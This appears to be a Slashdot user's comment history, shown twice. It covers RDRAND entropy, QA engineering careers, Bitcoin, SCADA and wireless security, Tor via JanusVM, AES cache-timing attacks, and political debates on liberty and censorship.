What is concerning are the twice refuted efforts for RDRAND to bypass the Linux kernel pool mixing entirely, and the design decisions which intentionally make RDRAND an inscrutable black box and trivial for a VMM to intercept and modify. These are not accidents.
While there is no harm in using RDRAND to complement entropy on a system, by no measure should it be used as the sole source of entropy in a system.
1) polemic agitator in attendance, in propinquity 2) opportunistic exploitation of overheard conversation occurs, twitter shaming to ten thousand 3) polemic agitator doubles down with histrionic blog post when twitter shame draws doubts and disapproval (this would be a crime in EU) 4) overly sensitive, over reactive start-up employer over compensates with firing, leading to social media furor, fanning flames 5) classy apology asking for less nuclear resolutions ignites the firestorm, critical mass achieved 6) juvenile hordes exact retribution on employers servers, DDoS'ing to oblivion until terms met 7) capitulation to vigilantes in a sea of misunderstanding drives media to madness
"Are you really honestly claiming that, based on this one rare and isolated incident, that casinos all do good to improve their overall security by getting rid of their cameras?"
No, but the "security tools" they apply should also be considered as sources of risk in the overall risk management equation. Too often security products get a pass because, well, they're security products.
The witty worm is another favorite example of this position of privilege turned against you.
Your development background will be very useful in a QA / Test Engineer role, assuming you are considering joining a technically competent organization.
I say this because many companies have an antiquated view of "testers" as low skilled keyboard jockeys able to bang keys and input fields like monkeys on ritalin. Avoid these places like the plague...
A premium QA/Test Engineer will apply development and other solid technical skills to:
- Provision test systems spanning wide varies of operating systems, network configuration, applications and settings, in short: be able to build everything you need to test the systems tasked of you.
- Obtain a deeper understanding of the system under test; able to dig into code to discern logical errors and oversights, triage down to root cause and even suggest a fix/patch.
- Integrate test automation technologies into the software process so regression and performance testing is part of a continuous integration & test lifecycle. Manual testing should only be a part of your efforts, as software systems continually expand in scope and a manual-only test process will eventually be overwhelmed by progress.
- Extend and apply third party tools, ranging from code performance analyzers to network traffic capture/replay, code coverage analysis and unit test frameworks, fuzzers and chaos monkeys, etc.
- Understand security risks and defensive coding techniques to identify deficiencies in a code base or implementation/design which introduce vulnerabilities. Catching these defects before a product goes live is very rewarding and can be exceptionally cost effective.
- Develop internal tools or customize existing software using Shell, PERL, Python, Ruby, Java, C/C++, and other languages as required or appropriate for the task at hand.
- Communicate effectively with multiple stake holders in an organization: development, product support, marketing, administration, operations. These will all be interfacing with you and the ability to tailor the technical depth and nomenclature of your written and oral communications to each of these groups is critical to being an effective QA/Test Engineer.
And many other skills and capabilities I've not listed, depending on the context of your role in the group and the domain of the organization you work for.
Many people still consider QA a less important or prestigious occupation compared to other technical professions, like software development. While the prestige may be lacking, the job satisfaction of a competent QA/Test Engineer who applies development, operations, and security analysis skills to improve a product is significant.
The many varied resources you should incorporate into your tester toolbox is too long to list here. Many sites exist devoted to QA toolsmith / test automation / security analysis roles, and you're going to want some skills and tools from all of these specialties at your disposal.
Good luck! I hope you consider the switch; the world needs more competent QA/Test Engineers.
"Any medium of exchange is just as much a shared hallucination as bitcoin..."
commodity based you can at least barter with or consume; in general you are correct and we agree.
they all have trade off's. i'll take decentralized, secure (potentially anonymous) Bitcoin and fend off the hackers while others pay banking intermediaries high fees for transactions performed at their leisure, presumably with less risk.
to each their own...;)
Re:That's how money works - a shared hallucination
on
The Bitcoin Strikes Back
·
· Score: 4, Interesting
"It has value because we pretend it does."
absolutely true!
fiat currencies are just as much a shared hallucination as bitcoin.
SCADA systems are not designed, implemented, or operated with network and application level security concerns in mind.
(Usually. The exceptions know who they are:)
Your compensating control is physical security to limit access to SCADA elements and programming. It costs more, but you have no sane alternative.
And before you get too cocky about that restricted air gap, consider Stuxnet turning such a strength into a weakness for exploit. At some point SCADA systems will be security conscious; that day is not today...
You can make Tor very easy to use with any application (on Windows or other VMWare/OpenVPN supported OS) with JanusVM: http://januswifi.dyndns.org:85/
When you start the Windows VPN connection to the VMWare virtual machine that PPTP network becomes you default route. All DNS lookups, http requests, and other TCP traffic is now transparently routed through Tor. Simply disconnect the VPN to terminate anonymous onion routing...
i don't know who suggested/queued the original article intro posted by Zonk. i am involved on the software side and posted the anonymous corrections (prior to recovering this long idle acct) since neither Kyle nor myself were contacted prior to publication to verify technical details in content as evidenced by the couple of mis-quoted or mis-interpreted points above.
or perhaps this is all an elaborate rouse designed to make you think in that direction...;)
See the clarification post. The passphrase is used to decrypt disk keys for loop-aes which contain more than 2000 bits of entropy. (23400 bits / 2925 bytes across 65 key lines to be precise. see the loop-aes readme for more detail)
If crypto is implemented in software, you can (relatively) easy fix bugs; if it's done in hardware, then every bug found means you're basically screwed.
you better not screw up a block cipher implementation. that is the point. FIPS certification is a good clue you got it right.
That being said, the attacks described are *not* remotely exploitable per se, and they can easily be worked around by not using hyperthreading, anyway, so they're really a tempest in a teapot.
"This paper reports successful extraction of a complete AES key from a network server on another computer. The targeted server used its key solely to encrypt data using the OpenSSL AES implementation on a Pentium III.
The successful attack was a very simple timing attack. Presumably the same technique can extract complete AES keys from the more complicated servers actually used to handle Internet data, although the attacks will often require extra timings to average out the effects of variable network delays.
We setup such a configuration at DEFCON and despite various attacks against both AP and client, including evil twin, WDS exploits, traffic replay, etc. the network was absolutely impenetrable.
The only secure configuration I would consider would be WPA2 with RADIUS authentication. Pre-shared key is vulnerable to dictionary attacks so be sure to key with a good random string if you use this mode.
It baffles me that a culture so obsessed with technical knowledge and accuracy can demonstrate such little attention to detail when it comes to communicating that knowledge with others
Human languages for person-person communication have a fair amount of redundancy to ensure reliable transmission. you "undrstnd wha im sying?"
languages designed for human-computer / computer-computer conversation are much less forgiving. flip a bit and the meaning is inverted!:)
you continue with ad hominem attacks and other logical fallacies and i'm not sure why; why do you insist on putting words in my mouth? to clarify:
They were spouting about unalienable rights at the same time many of them owned slaves who had none of these rights.
of course this is an ideal, just like anything else. the only true "right" as you seem intent on defining the term is the right to die. I don't agree with their interpretation (as slave owners, who did not respect these rights for all people, colored or female or otherwise) but i believe in the concept: that certain freedoms _should_ be granted to all persons, male, female, black, white, etc. it is this selective freedom based on other criteria (for example, men have more freedoms than women in islamic society) that I am opposed to.
et me harken back to something you said earlier, child porn is bad. So obviously after all this gushing idealism you are advocating that child porn be freely and abundantly available, and you are going to do your part to make sure that its readily available to all because you simply can't try to control the bits on the Internet.
of course not, and the purpose of law enforcement is to pursue these crimes through other mechanisms (there was child porn before digital networks and there will be ever after. they locate victims and track perpetrators; do you see the difference here?). if you want to control every bit on the networks you would make encryption illegal (as it makes traffic opaque) and you would need to have everyone access the net with secure nymity, lest they did something wrong and could not be identified. that is totalitarianism and a severe blow against the freedom to communicate.
The Downing Street Memo comes out now and it makes zero difference other than retierating something most people with a clue already knew
and how did you know it? that is my point. anyone with clue can see the flaws in current media coverage and that is where other media sources come into play. the fact that they are growing more popular and credible (and thus influencing mainstream media) shows that it is useful, and that when media does choose to report it some Justice Department Gulag doesn't come down and censor them.
Cmon pay attention, flash crowds can happen in either clustered or heterogenous networks. you can do central coding in both thought the results vary widely based on network topology.
i think we're splitting hairs here. what were we talking about?:)
Specifically, they get a 40% improvement over central coding and a 200% improvement over unencoded transfers.
read it again. they get 200% improvement over central coding in a clustered environment. they get 300% improvement over no coding in a clustered environment.
for heterogeneous networks its a much more conservative 20% better for central coding, 30% better than no coding.
and for flash crowds in heterogeneous networks it's 40% better than central coding, 200% better than no coding.
until someone actually builds one in the real world, that remains fiction, too.
absolutely; there are strong indicators that CPU/memory overhead associated with this type of network coding will make it less effective in practice. only a real world deployment on actual end user hardware will tell us...
That is just silly. You are never going to identify them, and you have no legal basis to compel them in to treatment.
that is the point; it is a problem they must identify as a problem and seek treatment (if it is available - that is the issue - making treatment available). i won't digress further into this; you need to understand the concept of liberty and the fact that you cannot regulate or enforce constraints on personal behavior that do not affect anyone else. to do so is the root of invasive forms of authoritarianism which is far worse than someone looking at too much porn.
you can't control bits over networks, to do so leads to a great big brother firewall where everything must be seen and inspected by the government / enforcement authority. that is an affront to liberty of every kind. you do not understand the concept of freedom to communicate if you think you can selectively control access to purely digital information.
Bottomline is you do want to inflict your culture and your values on the rest of the world
unalienable rights are not "culture inflicted" on the world. to go back to the slavery analogy, would you call abolition of slavery "inflicting culture" across the world? if so, we have nothing more to discuss. i am diametrically opposed to assaults against essential liberties that should be given to all men and women, regardless of culture.
If you are a big fan of freedom of speech maybe you should start by defending it at home.
please don't patronize me unknowingly. i do support these freedoms; it is a major part of how i spend my time, both implementing, deploying and improving anonymous networking systems, independant media, resource discovery, etc.
Fact is the Bush administration and Republican's are launching a full frontal assault on it
absolutely; they have done more to undermine essential liberties than anyone else in recent memory. i am actively and continually working to thwart their efforts.
As for "freedom of the press" the fact is the press in the U.S. has turned completely pathetic. No they aren't censored by the government, instead they are censored by advertisers, and their corprate head office and their ratings.
very true, which is why i spend so much time promoting and assisting with development of independant media channels. these have made a difference, for example the downing street memo would never have broken into US media were it not for independant media here pushing it forward. progress can be made, it is just difficult and slow.
The war in Iraq proved beyond a shadow of a doubt our press is more government cheerleader than anything and there is virtually no watchdog left in it.
this is true for the mainstream press/media, but freedom of speech means that our independant media can operate without government approval or interference. it may not have the infrastructure or resources but it is making a difference.
Yet dictatorships with overt suppression of speech and freedom are bad, but I think you are really kidding yourself to think there is really free speech or free press in this country either, the means for controlling it are just somewhat more subtle than a jack boot and a billy club.
you need to understand the concept of free speech: it is not that mainstream media needs to be more truthful, it is that independant media can exist without government approval (and even severe disapproval) and yet continue to exist. sometimes our mainstream media will steup up to the bar and fulfill a useful purpose - watergate perhaps. but most often than not it will be the independant channels unbiased by advertisers or government influence who relay authentic newsworthy information.
From that predisposition its been established by the powers that be that Islamic cultures must be westernized to be acceptable and in the process they seek to make them no longer Islamic.
this is not about westernization, it is about basic freedoms. women should be free to work, free to educate themselves, free to not be publicly stoned to death for having sex out of marriage.
if such freedoms "destroy islamic culture", which they would not, then it doesn't matter. slavery used to be culturally acceptable but that doesn't matter: it violated basic human freedoms and needed to be abolished regardless.
in their never ending obsession to find more and better porn to squander their life staring at instead of doing something productive and worthwhile.
this is called addiction, and just like drug addiction or other addictions it is best resolved through treatment and rehabilitation. not incarceration, not prohibition, none of that works well and often causes more harm than good.
you seem inclined to want an authoritarian government to control vices without understanding the dark roads that such intent leads to.
After having lived in America for a while I guess maybe I've reached the point that I'm not sure there are many people left here who do have an "ethical sense" whether they be religious or not. I imagine greed is a nearly universal trait, but someone how America in particular has turned it in to a cultural priority.
this is a huge problem and one that is overlooked. there are many of us americans who are trying to change that; to paint greed as a vice and not virtue, to emphasize the benefits of cooperation instead of competition. you need to separate the notion of western corporate culture with western social progress.
i'm all for westernization of the east if that means western concepts of womens equality, deprecation of authoritarianism and patriarchy. i'm completely against westernization in the form of psychopathic corporate business practices.
there is a lot more to be done here as well; the religious conservatives in this country are hell bent on establishing authoritarian controls on moral code which is detestable and must be opposed.
women are still subjected to various types of descrimination and sexual assault / rape at far to frequent levels.
i too would hate to see the world homogenized in to an American culture; i don't think it is likely to happen.
i would very much like to see certain aspects of american freedom homogenized across the world, like womens rights, freedom of speech and the press, etc.
network coding performs better than transmitting unencoded blocks, or using techniques that are based on erasure codes, which can be thought as coding but only at the server.
this is exactly the big improvement they talk about. the flash crowd problem is one of the main problems they are trying to tackle with networking coding and they anticipate a 40-200% improvement over central coding or unencoded transfer.
i agree that these results are speculation; but the paper clearly describes the superiority of network coding over erasure/online codes performed centrally as far as their model / simulations are concerned.
Slashdot Mirror
What is concerning are the twice refuted efforts for RDRAND to bypass the Linux kernel pool mixing entirely, and the design decisions which intentionally make RDRAND an inscrutable black box and trivial for a VMM to intercept and modify. These are not accidents.
While there is no harm in using RDRAND to complement entropy on a system, by no measure should it be used as the sole source of entropy in a system.
I tried to mod your comment +"insightful"; alas, I'm out of points...
the stars must align for a clusterfsck this big:
1) polemic agitator in attendance, in propinquity
2) opportunistic exploitation of overheard conversation occurs, twitter shaming to ten thousand
3) polemic agitator doubles down with histrionic blog post when twitter shame draws doubts and disapproval (this would be a crime in EU)
4) overly sensitive, over reactive start-up employer over compensates with firing, leading to social media furor, fanning flames
5) classy apology asking for less nuclear resolutions ignites the firestorm, critical mass achieved
6) juvenile hordes exact retribution on employers servers, DDoS'ing to oblivion until terms met
7) capitulation to vigilantes in a sea of misunderstanding drives media to madness
"Are you really honestly claiming that, based on this one rare and isolated incident, that casinos all do good to improve their overall security by getting rid of their cameras?"
No, but the "security tools" they apply should also be considered as sources of risk in the overall risk management equation. Too often security products get a pass because, well, they're security products.
The witty worm is another favorite example of this position of privilege turned against you.
Your development background will be very useful in a QA / Test Engineer role, assuming you are considering joining a technically competent organization.
I say this because many companies have an antiquated view of "testers" as low skilled keyboard jockeys able to bang keys and input fields like monkeys on ritalin. Avoid these places like the plague...
A premium QA/Test Engineer will apply development and other solid technical skills to:
- Provision test systems spanning wide varies of operating systems, network configuration, applications and settings, in short: be able to build everything you need to test the systems tasked of you.
- Obtain a deeper understanding of the system under test; able to dig into code to discern logical errors and oversights, triage down to root cause and even suggest a fix/patch.
- Integrate test automation technologies into the software process so regression and performance testing is part of a continuous integration & test lifecycle. Manual testing should only be a part of your efforts, as software systems continually expand in scope and a manual-only test process will eventually be overwhelmed by progress.
- Extend and apply third party tools, ranging from code performance analyzers to network traffic capture/replay, code coverage analysis and unit test frameworks, fuzzers and chaos monkeys, etc.
- Understand security risks and defensive coding techniques to identify deficiencies in a code base or implementation/design which introduce vulnerabilities. Catching these defects before a product goes live is very rewarding and can be exceptionally cost effective.
- Develop internal tools or customize existing software using Shell, PERL, Python, Ruby, Java, C/C++, and other languages as required or appropriate for the task at hand.
- Communicate effectively with multiple stake holders in an organization: development, product support, marketing, administration, operations. These will all be interfacing with you and the ability to tailor the technical depth and nomenclature of your written and oral communications to each of these groups is critical to being an effective QA/Test Engineer.
And many other skills and capabilities I've not listed, depending on the context of your role in the group and the domain of the organization you work for.
Many people still consider QA a less important or prestigious occupation compared to other technical professions, like software development. While the prestige may be lacking, the job satisfaction of a competent QA/Test Engineer who applies development, operations, and security analysis skills to improve a product is significant.
The many varied resources you should incorporate into your tester toolbox is too long to list here. Many sites exist devoted to QA toolsmith / test automation / security analysis roles, and you're going to want some skills and tools from all of these specialties at your disposal.
Good luck! I hope you consider the switch; the world needs more competent QA/Test Engineers.
Just wait until we have matter compilers.
Except where I come from, we call them "ribosomes".
Yes; but knowing how to programming those matter compilers, ... GOTO 10
"Any medium of exchange is just as much a shared hallucination as bitcoin..."
commodity based you can at least barter with or consume; in general you are correct and we agree.
they all have trade off's. i'll take decentralized, secure (potentially anonymous) Bitcoin and fend off the hackers while others pay banking intermediaries high fees for transactions performed at their leisure, presumably with less risk.
to each their own... ;)
"It has value because we pretend it does."
absolutely true!
fiat currencies are just as much a shared hallucination as bitcoin.
at least bitcoins may provide more privacy...
SCADA systems are not designed, implemented, or operated with network and application level security concerns in mind. :)
(Usually. The exceptions know who they are
Your compensating control is physical security to limit access to SCADA elements and programming. It costs more, but you have no sane alternative.
And before you get too cocky about that restricted air gap, consider Stuxnet turning such a strength into a weakness for exploit. At some point SCADA systems will be security conscious; that day is not today...
"... there's no way in hell you could EVER know what the entire body of law"
This is where jury nullification comes in. But they don't like that much either!
You can make Tor very easy to use with any application (on Windows or other VMWare/OpenVPN supported OS) with JanusVM:
http://januswifi.dyndns.org:85/
When you start the Windows VPN connection to the VMWare virtual machine that PPTP network becomes you default route. All DNS lookups, http requests, and other TCP traffic is now transparently routed through Tor. Simply disconnect the VPN to terminate anonymous onion routing...
Also see the user documentation: http://januswifi.dyndns.org:85/Instructions.htm
Transparent proxy avoids many common problems with explicit SOCKS configuration and DNS leaks. Worth a look...
i don't know who suggested/queued the original article intro posted by Zonk. i am involved on the software side and posted the anonymous corrections (prior to recovering this long idle acct) since neither Kyle nor myself were contacted prior to publication to verify technical details in content as evidenced by the couple of mis-quoted or mis-interpreted points above.
;)
or perhaps this is all an elaborate rouse designed to make you think in that direction...
See the clarification post. The passphrase is used to decrypt disk keys for loop-aes which contain more than 2000 bits of entropy. (23400 bits / 2925 bytes across 65 key lines to be precise. see the loop-aes readme for more detail)
Do we have to worry about the device falling into the wrong hands?
Accidental sterilization due to prolonged RF absorbtion is a serious problem. Also, a bottle of excedrin helps keep the microwave headaches at bay...
[but seriously, use a properly keyed VPN over wireless and you're in good shape against any attacker.]
Anonymous Coward AKA Kyle Williams
:)
guess again...
you better not screw up a block cipher implementation. that is the point. FIPS certification is a good clue you got it right.
That being said, the attacks described are *not* remotely exploitable per se, and they can easily be worked around by not using hyperthreading, anyway, so they're really a tempest in a teapot.
"This paper reports successful extraction of a complete AES key from a network server on another computer. The targeted server used its key solely to encrypt data using the OpenSSL AES implementation on a Pentium III.
The successful attack was a very simple timing attack. Presumably the same technique can extract complete AES keys from the more complicated servers actually used to handle Internet data, although the attacks will often require extra timings to average out the effects of variable network delays.
cr.yp.to/antiforgery/cachetiming-20050414.pdf
considering remotely exploitable cache timing attacks against all software implementations of AES and other S-Box constructions will Intel grow some brain cells and put crypto directlty into the core?
i don't think they are that smart...
IPSec SHA256 AH AES128 ESP
We setup such a configuration at DEFCON and despite various attacks against both AP and client, including evil twin, WDS exploits, traffic replay, etc. the network was absolutely impenetrable.
The only secure configuration I would consider would be WPA2 with RADIUS authentication. Pre-shared key is vulnerable to dictionary attacks so be sure to key with a good random string if you use this mode.
It baffles me that a culture so obsessed with technical knowledge and accuracy can demonstrate such little attention to detail when it comes to communicating that knowledge with others
:)
Human languages for person-person communication have a fair amount of redundancy to ensure reliable transmission. you "undrstnd wha im sying?"
languages designed for human-computer / computer-computer conversation are much less forgiving. flip a bit and the meaning is inverted!
you continue with ad hominem attacks and other logical fallacies and i'm not sure why; why do you insist on putting words in my mouth? to clarify:
They were spouting about unalienable rights at the same time many of them owned slaves who had none of these rights.
of course this is an ideal, just like anything else. the only true "right" as you seem intent on defining the term is the right to die. I don't agree with their interpretation (as slave owners, who did not respect these rights for all people, colored or female or otherwise) but i believe in the concept: that certain freedoms _should_ be granted to all persons, male, female, black, white, etc. it is this selective freedom based on other criteria (for example, men have more freedoms than women in islamic society) that I am opposed to.
et me harken back to something you said earlier, child porn is bad. So obviously after all this gushing idealism you are advocating that child porn be freely and abundantly available, and you are going to do your part to make sure that its readily available to all because you simply can't try to control the bits on the Internet.
of course not, and the purpose of law enforcement is to pursue these crimes through other mechanisms (there was child porn before digital networks and there will be ever after. they locate victims and track perpetrators; do you see the difference here?). if you want to control every bit on the networks you would make encryption illegal (as it makes traffic opaque) and you would need to have everyone access the net with secure nymity, lest they did something wrong and could not be identified. that is totalitarianism and a severe blow against the freedom to communicate.
The Downing Street Memo comes out now and it makes zero difference other than retierating something most people with a clue already knew
and how did you know it? that is my point. anyone with clue can see the flaws in current media coverage and that is where other media sources come into play. the fact that they are growing more popular and credible (and thus influencing mainstream media) shows that it is useful, and that when media does choose to report it some Justice Department Gulag doesn't come down and censor them.
Cmon pay attention, flash crowds can happen in either clustered or heterogenous networks. you can do central coding in both thought the results vary widely based on network topology.
:)
i think we're splitting hairs here. what were we talking about?
Specifically, they get a 40% improvement over central coding and a 200% improvement over unencoded transfers.
read it again. they get 200% improvement over central coding in a clustered environment. they get 300% improvement over no coding in a clustered environment.
for heterogeneous networks its a much more conservative 20% better for central coding, 30% better than no coding.
and for flash crowds in heterogeneous networks it's 40% better than central coding, 200% better than no coding.
until someone actually builds one in the real world, that remains fiction, too.
absolutely; there are strong indicators that CPU/memory overhead associated with this type of network coding will make it less effective in practice. only a real world deployment on actual end user hardware will tell us...
That is just silly. You are never going to identify them, and you have no legal basis to compel them in to treatment.
that is the point; it is a problem they must identify as a problem and seek treatment (if it is available - that is the issue - making treatment available). i won't digress further into this; you need to understand the concept of liberty and the fact that you cannot regulate or enforce constraints on personal behavior that do not affect anyone else. to do so is the root of invasive forms of authoritarianism which is far worse than someone looking at too much porn.
you can't control bits over networks, to do so leads to a great big brother firewall where everything must be seen and inspected by the government / enforcement authority. that is an affront to liberty of every kind. you do not understand the concept of freedom to communicate if you think you can selectively control access to purely digital information.
Bottomline is you do want to inflict your culture and your values on the rest of the world
unalienable rights are not "culture inflicted" on the world. to go back to the slavery analogy, would you call abolition of slavery "inflicting culture" across the world? if so, we have nothing more to discuss. i am diametrically opposed to assaults against essential liberties that should be given to all men and women, regardless of culture.
If you are a big fan of freedom of speech maybe you should start by defending it at home.
please don't patronize me unknowingly. i do support these freedoms; it is a major part of how i spend my time, both implementing, deploying and improving anonymous networking systems, independant media, resource discovery, etc.
Fact is the Bush administration and Republican's are launching a full frontal assault on it
absolutely; they have done more to undermine essential liberties than anyone else in recent memory. i am actively and continually working to thwart their efforts.
As for "freedom of the press" the fact is the press in the U.S. has turned completely pathetic. No they aren't censored by the government, instead they are censored by advertisers, and their corprate head office and their ratings.
very true, which is why i spend so much time promoting and assisting with development of independant media channels. these have made a difference, for example the downing street memo would never have broken into US media were it not for independant media here pushing it forward. progress can be made, it is just difficult and slow.
The war in Iraq proved beyond a shadow of a doubt our press is more government cheerleader than anything and there is virtually no watchdog left in it.
this is true for the mainstream press/media, but freedom of speech means that our independant media can operate without government approval or interference. it may not have the infrastructure or resources but it is making a difference.
Yet dictatorships with overt suppression of speech and freedom are bad, but I think you are really kidding yourself to think there is really free speech or free press in this country either, the means for controlling it are just somewhat more subtle than a jack boot and a billy club.
you need to understand the concept of free speech: it is not that mainstream media needs to be more truthful, it is that independant media can exist without government approval (and even severe disapproval) and yet continue to exist. sometimes our mainstream media will steup up to the bar and fulfill a useful purpose - watergate perhaps. but most often than not it will be the independant channels unbiased by advertisers or government influence who relay authentic newsworthy information.
From that predisposition its been established by the powers that be that Islamic cultures must be westernized to be acceptable and in the process they seek to make them no longer Islamic.
this is not about westernization, it is about basic freedoms. women should be free to work, free to educate themselves, free to not be publicly stoned to death for having sex out of marriage.
if such freedoms "destroy islamic culture", which they would not, then it doesn't matter. slavery used to be culturally acceptable but that doesn't matter: it violated basic human freedoms and needed to be abolished regardless.
in their never ending obsession to find more and better porn to squander their life staring at instead of doing something productive and worthwhile.
this is called addiction, and just like drug addiction or other addictions it is best resolved through treatment and rehabilitation. not incarceration, not prohibition, none of that works well and often causes more harm than good.
you seem inclined to want an authoritarian government to control vices without understanding the dark roads that such intent leads to.
After having lived in America for a while I guess maybe I've reached the point that I'm not sure there are many people left here who do have an "ethical sense" whether they be religious or not. I imagine greed is a nearly universal trait, but someone how America in particular has turned it in to a cultural priority.
this is a huge problem and one that is overlooked. there are many of us americans who are trying to change that; to paint greed as a vice and not virtue, to emphasize the benefits of cooperation instead of competition. you need to separate the notion of western corporate culture with western social progress.
i'm all for westernization of the east if that means western concepts of womens equality, deprecation of authoritarianism and patriarchy. i'm completely against westernization in the form of psychopathic corporate business practices.
there is a lot more to be done here as well; the religious conservatives in this country are hell bent on establishing authoritarian controls on moral code which is detestable and must be opposed.
women are still subjected to various types of descrimination and sexual assault / rape at far to frequent levels.
i too would hate to see the world homogenized in to an American culture; i don't think it is likely to happen.
i would very much like to see certain aspects of american freedom homogenized across the world, like womens rights, freedom of speech and the press, etc.
network coding performs better than transmitting unencoded blocks, or using techniques that are
based on erasure codes, which can be thought as coding but only at the server.
this is exactly the big improvement they talk about. the flash crowd problem is one of the main problems they are trying to tackle with networking coding and they anticipate a 40-200% improvement over central coding or unencoded transfer.
i agree that these results are speculation; but the paper clearly describes the superiority of network coding over erasure/online codes performed centrally as far as their model / simulations are concerned.